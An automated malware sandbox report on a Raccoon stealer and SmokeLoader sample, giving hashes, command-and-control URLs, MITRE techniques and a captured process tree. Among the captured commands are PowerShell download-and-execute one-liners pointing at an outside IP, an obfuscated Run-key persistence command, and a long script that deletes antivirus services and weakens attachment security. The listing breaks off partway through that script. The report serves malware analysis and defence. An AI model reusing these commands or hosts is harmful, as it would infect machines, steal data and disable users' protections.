raccoon | 54207c241b9309f9bf51a57b069fa3c70459d9de3b7daee3e063b171cf1e012e

Analysis

max time kernel
153s
max time network
155s
platform
windows10_x64
resource
win10v20210410
submitted
13-08-2021 10:06

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

bc273d113b663aaa58f500151d75baa5.exe
Size

312KB
MD5

bc273d113b663aaa58f500151d75baa5
SHA1

cec4fbd41871184fdd2977993acb9e4dead31fcf
SHA256

54207c241b9309f9bf51a57b069fa3c70459d9de3b7daee3e063b171cf1e012e
SHA512

de2a4ff764ea45d883293522a6f1fa0d0ea1f6e7d38abae15224eb2813d63d342dcfdbded69a3e4e19e77e37295e35d196ba34d0f02c7309b4f6e06860da4b21

Score

10^/10

raccoon smokeloader 471c70de3b4f9e4d493e418d1f60a90659057de0 cd8dc1031358b1aec55cc6bc447df1018b068607 backdoor evasion persistence phishing stealer trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://193.56.146.55/Api/GetFile2

Extracted

Family

smokeloader

Version

2020

http://readinglistforjuly1.xyz/

http://readinglistforjuly2.xyz/

http://readinglistforjuly3.xyz/

http://readinglistforjuly4.xyz/

http://readinglistforjuly5.xyz/

http://readinglistforjuly6.xyz/

http://readinglistforjuly7.xyz/

http://readinglistforjuly8.xyz/

http://readinglistforjuly9.xyz/

http://readinglistforjuly10.xyz/

http://readinglistforjuly1.site/

http://readinglistforjuly2.site/

http://readinglistforjuly3.site/

http://readinglistforjuly4.site/

http://readinglistforjuly5.site/

http://readinglistforjuly6.site/

http://readinglistforjuly7.site/

http://readinglistforjuly8.site/

http://readinglistforjuly9.site/

http://readinglistforjuly10.site/

rc4.i32

Extracted

Family

raccoon

Botnet

471c70de3b4f9e4d493e418d1f60a90659057de0

Attributes

url4cnc
https://telete.in/p1rosto100xx

rc4.plain

Extracted

Family

raccoon

Botnet

cd8dc1031358b1aec55cc6bc447df1018b068607

Attributes

url4cnc
https://telete.in/jagressor_kz

rc4.plain

Signatures

Detected phishing page
phishing
Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
Raccoon
Simple but powerful infostealer which was very active in 2019.
stealer raccoon

Raccoon Stealer Payload 3 IoCs

Processes:

resource	yara_rule
behavioral2/memory/1188-193-0x0000000000400000-0x0000000000495000-memory.dmp	family_raccoon
behavioral2/memory/1972-224-0x0000000004860000-0x00000000048F1000-memory.dmp	family_raccoon
behavioral2/memory/1972-232-0x0000000000400000-0x0000000002CA9000-memory.dmp	family_raccoon

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs

Processes:

WerFault.exe

description pid process target process

PID 2212 created 1972 2212 WerFault.exe CB7.exe
Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

806 2580 powershell.exe
Downloads MZ/PE file
Executes dropped EXE 7 IoCs

Processes:

AD0E.exeB0C8.exeB31B.exeB464.exeRuntimebroker.exeB464.exeCB7.exe

pid process

904 AD0E.exe
3836 B0C8.exe
2076 B31B.exe
2444 B464.exe
520 Runtimebroker.exe
1188 B464.exe
1972 CB7.exe
Deletes itself 1 IoCs

Processes:

pid process

388

description	pid	process	target process
PID 2212 created 1972	2212	WerFault.exe	CB7.exe

flow	pid	process
806	2580	powershell.exe

pid	process
904	AD0E.exe
3836	B0C8.exe
2076	B31B.exe
2444	B464.exe
520	Runtimebroker.exe
1188	B464.exe
1972	CB7.exe

pid	process
388

Drops startup file 3 IoCs

Processes:

cmd.exeRuntimebroker.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchostsw.exe	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchostsw.exe	cmd.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sound device.lnk	Runtimebroker.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

powershell.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run\Sound device = "Cmd.Exe /c POwERsheLl -WinD HIDDen -CoMmAN (New-Object System.Net.WebClient).DownloadFile(('http://193.56.146.55/Ru'+'nti'+'m'+'ebr'+'oke'+'r.exe'),($env:TEMP+'\\Vp'+'nm.e'+'xe'));Start-Process ($env:TEMP+'\\V'+'pn'+'m.exe')"	powershell.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

bc273d113b663aaa58f500151d75baa5.exeB464.exe

description	pid	process	target process
PID 3908 set thread context of 2624	3908	bc273d113b663aaa58f500151d75baa5.exe	bc273d113b663aaa58f500151d75baa5.exe
PID 2444 set thread context of 1188	2444	B464.exe	B464.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 18 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
1668	3836	WerFault.exe	B0C8.exe
3984	3836	WerFault.exe	B0C8.exe
2064	3836	WerFault.exe	B0C8.exe
4016	3836	WerFault.exe	B0C8.exe
3572	3836	WerFault.exe	B0C8.exe
2728	3836	WerFault.exe	B0C8.exe
2212	520	WerFault.exe	Runtimebroker.exe
3340	520	WerFault.exe	Runtimebroker.exe
2156	520	WerFault.exe	Runtimebroker.exe
1596	520	WerFault.exe	Runtimebroker.exe
856	520	WerFault.exe	Runtimebroker.exe
2700	520	WerFault.exe	Runtimebroker.exe
2124	1188	WerFault.exe	B464.exe
3380	1972	WerFault.exe	CB7.exe
2232	1972	WerFault.exe	CB7.exe
2212	1972	WerFault.exe	CB7.exe
340	1972	WerFault.exe	CB7.exe
2212	1972	WerFault.exe	CB7.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

bc273d113b663aaa58f500151d75baa5.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	bc273d113b663aaa58f500151d75baa5.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	bc273d113b663aaa58f500151d75baa5.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	bc273d113b663aaa58f500151d75baa5.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

bc273d113b663aaa58f500151d75baa5.exe

pid	process
2624	bc273d113b663aaa58f500151d75baa5.exe
2624	bc273d113b663aaa58f500151d75baa5.exe
388
388
388
388
388
388
388
388
388
388
388
388
388
388
388
388
388
388
388
388
388
388
388
388
388
388
388
388
388
388
388
388
388
388
388
388
388
388
388
388
388
388
388
388
388
388
388
388
388
388
388
388
388
388
388
388
388
388
388
388
388
388

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

pid process

388
Suspicious behavior: MapViewOfSection 19 IoCs

Processes:

bc273d113b663aaa58f500151d75baa5.exe

pid process

2624 bc273d113b663aaa58f500151d75baa5.exe
388
388
388
388
388
388
388
388
388
388
388
388
388
388
388
388
388
388

pid	process
388

Suspicious use of AdjustPrivilegeToken 41 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepowershell.exepowershell.exeB464.exepowershell.exeWerFault.exeexplorer.exeWerFault.exeWerFault.exe

description	pid	process
Token: SeShutdownPrivilege	388
Token: SeCreatePagefilePrivilege	388
Token: SeShutdownPrivilege	388
Token: SeCreatePagefilePrivilege	388
Token: SeRestorePrivilege	1668	WerFault.exe
Token: SeBackupPrivilege	1668	WerFault.exe
Token: SeDebugPrivilege	1668	WerFault.exe
Token: SeDebugPrivilege	3984	WerFault.exe
Token: SeDebugPrivilege	2064	WerFault.exe
Token: SeDebugPrivilege	4016	WerFault.exe
Token: SeDebugPrivilege	3572	WerFault.exe
Token: SeDebugPrivilege	2728	WerFault.exe
Token: SeDebugPrivilege	2212	WerFault.exe
Token: SeDebugPrivilege	3340	WerFault.exe
Token: SeDebugPrivilege	2156	WerFault.exe
Token: SeDebugPrivilege	1596	WerFault.exe
Token: SeDebugPrivilege	856	WerFault.exe
Token: SeDebugPrivilege	2700	WerFault.exe
Token: SeDebugPrivilege	1836	powershell.exe
Token: SeShutdownPrivilege	388
Token: SeCreatePagefilePrivilege	388
Token: SeDebugPrivilege	2580	powershell.exe
Token: SeDebugPrivilege	2444	B464.exe
Token: SeDebugPrivilege	2932	powershell.exe
Token: SeDebugPrivilege	3380	WerFault.exe
Token: SeDebugPrivilege	2232	explorer.exe
Token: SeDebugPrivilege	2212	WerFault.exe
Token: SeDebugPrivilege	340	WerFault.exe
Token: SeDebugPrivilege	2212	WerFault.exe
Token: SeShutdownPrivilege	388
Token: SeCreatePagefilePrivilege	388
Token: SeShutdownPrivilege	388
Token: SeCreatePagefilePrivilege	388
Token: SeShutdownPrivilege	388
Token: SeCreatePagefilePrivilege	388
Token: SeShutdownPrivilege	388
Token: SeCreatePagefilePrivilege	388
Token: SeShutdownPrivilege	388
Token: SeCreatePagefilePrivilege	388
Token: SeShutdownPrivilege	388
Token: SeCreatePagefilePrivilege	388

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

AD0E.exe

pid process

904 AD0E.exe
Suspicious use of UnmapMainImage 1 IoCs

Processes:

pid process

388

pid	process
904	AD0E.exe

pid	process
388

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

bc273d113b663aaa58f500151d75baa5.exeB0C8.exeRuntimebroker.exeB31B.exeB464.exepowershell.exe

description	pid	process	target process
PID 3908 wrote to memory of 2624	3908	bc273d113b663aaa58f500151d75baa5.exe	bc273d113b663aaa58f500151d75baa5.exe
PID 3908 wrote to memory of 2624	3908	bc273d113b663aaa58f500151d75baa5.exe	bc273d113b663aaa58f500151d75baa5.exe
PID 3908 wrote to memory of 2624	3908	bc273d113b663aaa58f500151d75baa5.exe	bc273d113b663aaa58f500151d75baa5.exe
PID 3908 wrote to memory of 2624	3908	bc273d113b663aaa58f500151d75baa5.exe	bc273d113b663aaa58f500151d75baa5.exe
PID 3908 wrote to memory of 2624	3908	bc273d113b663aaa58f500151d75baa5.exe	bc273d113b663aaa58f500151d75baa5.exe
PID 3908 wrote to memory of 2624	3908	bc273d113b663aaa58f500151d75baa5.exe	bc273d113b663aaa58f500151d75baa5.exe
PID 388 wrote to memory of 904	388		AD0E.exe
PID 388 wrote to memory of 904	388		AD0E.exe
PID 388 wrote to memory of 904	388		AD0E.exe
PID 388 wrote to memory of 3836	388		B0C8.exe
PID 388 wrote to memory of 3836	388		B0C8.exe
PID 388 wrote to memory of 3836	388		B0C8.exe
PID 388 wrote to memory of 2076	388		B31B.exe
PID 388 wrote to memory of 2076	388		B31B.exe
PID 388 wrote to memory of 2076	388		B31B.exe
PID 388 wrote to memory of 2444	388		B464.exe
PID 388 wrote to memory of 2444	388		B464.exe
PID 388 wrote to memory of 2444	388		B464.exe
PID 3836 wrote to memory of 520	3836	B0C8.exe	Runtimebroker.exe
PID 3836 wrote to memory of 520	3836	B0C8.exe	Runtimebroker.exe
PID 3836 wrote to memory of 520	3836	B0C8.exe	Runtimebroker.exe
PID 520 wrote to memory of 1836	520	Runtimebroker.exe	powershell.exe
PID 520 wrote to memory of 1836	520	Runtimebroker.exe	powershell.exe
PID 520 wrote to memory of 1836	520	Runtimebroker.exe	powershell.exe
PID 2076 wrote to memory of 2168	2076	B31B.exe	cmd.exe
PID 2076 wrote to memory of 2168	2076	B31B.exe	cmd.exe
PID 2076 wrote to memory of 2168	2076	B31B.exe	cmd.exe
PID 520 wrote to memory of 2580	520	Runtimebroker.exe	powershell.exe
PID 520 wrote to memory of 2580	520	Runtimebroker.exe	powershell.exe
PID 520 wrote to memory of 2580	520	Runtimebroker.exe	powershell.exe
PID 2444 wrote to memory of 1188	2444	B464.exe	B464.exe
PID 2444 wrote to memory of 1188	2444	B464.exe	B464.exe
PID 2444 wrote to memory of 1188	2444	B464.exe	B464.exe
PID 2444 wrote to memory of 1188	2444	B464.exe	B464.exe
PID 2444 wrote to memory of 1188	2444	B464.exe	B464.exe
PID 2444 wrote to memory of 1188	2444	B464.exe	B464.exe
PID 2444 wrote to memory of 1188	2444	B464.exe	B464.exe
PID 2444 wrote to memory of 1188	2444	B464.exe	B464.exe
PID 2444 wrote to memory of 1188	2444	B464.exe	B464.exe
PID 2580 wrote to memory of 2932	2580	powershell.exe	powershell.exe
PID 2580 wrote to memory of 2932	2580	powershell.exe	powershell.exe
PID 2580 wrote to memory of 2932	2580	powershell.exe	powershell.exe
PID 388 wrote to memory of 1972	388		CB7.exe
PID 388 wrote to memory of 1972	388		CB7.exe
PID 388 wrote to memory of 1972	388		CB7.exe
PID 388 wrote to memory of 340	388		WerFault.exe
PID 388 wrote to memory of 340	388		WerFault.exe
PID 388 wrote to memory of 340	388		WerFault.exe
PID 388 wrote to memory of 340	388		WerFault.exe
PID 388 wrote to memory of 3908	388		explorer.exe
PID 388 wrote to memory of 3908	388		explorer.exe
PID 388 wrote to memory of 3908	388		explorer.exe
PID 388 wrote to memory of 2000	388		explorer.exe
PID 388 wrote to memory of 2000	388		explorer.exe
PID 388 wrote to memory of 2000	388		explorer.exe
PID 388 wrote to memory of 2000	388		explorer.exe
PID 388 wrote to memory of 2232	388		explorer.exe
PID 388 wrote to memory of 2232	388		explorer.exe
PID 388 wrote to memory of 2232	388		explorer.exe
PID 388 wrote to memory of 4392	388		explorer.exe
PID 388 wrote to memory of 4392	388		explorer.exe
PID 388 wrote to memory of 4392	388		explorer.exe
PID 388 wrote to memory of 4392	388		explorer.exe
PID 388 wrote to memory of 4464	388		explorer.exe

C:\Users\Admin\AppData\Local\Temp\bc273d113b663aaa58f500151d75baa5.exe
"C:\Users\Admin\AppData\Local\Temp\bc273d113b663aaa58f500151d75baa5.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3908

C:\Users\Admin\AppData\Local\Temp\bc273d113b663aaa58f500151d75baa5.exe
"C:\Users\Admin\AppData\Local\Temp\bc273d113b663aaa58f500151d75baa5.exe"
2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:2624

C:\Users\Admin\AppData\Local\Temp\AD0E.exe
C:\Users\Admin\AppData\Local\Temp\AD0E.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:904

C:\Users\Admin\AppData\Local\Temp\B0C8.exe
C:\Users\Admin\AppData\Local\Temp\B0C8.exe
1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3836

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3836 -s 852
2⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:1668

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3836 -s 884
2⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:3984

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3836 -s 936
2⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:2064

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3836 -s 900
2⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:4016

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3836 -s 844
2⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:3572

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3836 -s 916
2⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:2728

C:\ProgramData\Runtimebroker.exe
"C:\ProgramData\Runtimebroker.exe"
2⤵
- Executes dropped EXE
- Drops startup file
- Suspicious use of WriteProcessMemory
PID:520

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 520 -s 748
3⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:2212

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 520 -s 800
3⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:3340

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 520 -s 772
3⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:2156

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 520 -s 780
3⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:1596

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 520 -s 1008
3⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:856

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 520 -s 1020
3⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:2700

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell Set-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Sound device' -Value 'Cmd.Exe /c POwERsheLl -WinD HIDDen -CoMmAN (New-Object System.Net.WebClient).DownloadFile((''http://193.56.146.55/Ru''+''nti''+''m''+''ebr''+''oke''+''r.exe''),($env:TEMP+''\Vp''+''nm.e''+''xe''));Start-Process ($env:TEMP+''\V''+''pn''+''m.exe'')'
3⤵
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
PID:1836

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell $dll =[Reflection.Assembly]::Load((New-Object System.Net.WebClient).DownloadData('http://193.56.146.55/Api/GetFile2'));$theType = $dll.GetType('filedll.Program');$method = $theType.GetMethod('Start');$method.Invoke([System.Activator]::CreateInstance($theType),@());rv dll,theType,method
3⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2580

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" Get-MpPreference -verbose
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2932

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" @echo off Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE2.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE1.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP18.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP17.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP16.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP15.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP14.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP13.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP12.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP11.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP10.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MBAMService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAWFwk" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MSK80Service" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAPExe" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McBootDelayStartSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mccspsvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfefire" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\HomeNetSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ModuleCoreService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McMPFSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mcpltsvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McProxy" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McODS" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfemms" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAfee SiteAdvisor Service" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfevtp" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McNaiAnn" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\nanosvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\NortonSecurity" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\!SASCORE" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\SBAMSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVAuxSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVCoreSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\QHActiveDefense" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\avast! Antivirus" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\avast! Firewall" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVG Antivirus" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirMailService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\Avira.ServiceHost" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirWebService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirSchedulerService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsservppl" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ProductAgentService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsserv" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\updatesrv" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdAgent" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdvirth" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\DragonUpdater" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ekrn" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\0247141531883172mcinstcleanup" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\PEFService" /f set "osX=%PROCESSOR_ARCHITECTURE%" if defined PROCESSOR_ARCHITEW6432 set "osX=AMD64" if "%osX%"=="x86" ( Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "DefaultFileTypeRisk" /t REG_DWORD /d "24914" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "HideZoneInfoOnProperties" /t REG_DWORD /d "1" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "2" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "DisplayName" /t REG_SZ /d "RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "UninstallString" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg.exe -bootremove -uninst:RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK_Path" /t REG_SZ /d "%windir%\system32\rlls.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK64_Path" /t REG_SZ /d "%windir%\system32\rlls64.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "LD64_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg64.exe" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "KS_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlls.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "SV_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlservice.exe" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy" /v "" /t REG_SZ /d "" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RunLine" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg.exe -boot" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "ServiceName" /t REG_SZ /d "RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "UninstURL" /t REG_SZ /d "http://www.relevantknowledge.com/confirmuninstall.aspx?siteid=2600&campaign_id=794" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RevertPath" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f ) else ( Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "DefaultFileTypeRisk" /t REG_DWORD /d "24914" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "HideZoneInfoOnProperties" /t REG_DWORD /d "1" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "2" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "DisplayName" /t REG_SZ /d "RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "UninstallString" /t REG_SZ /d 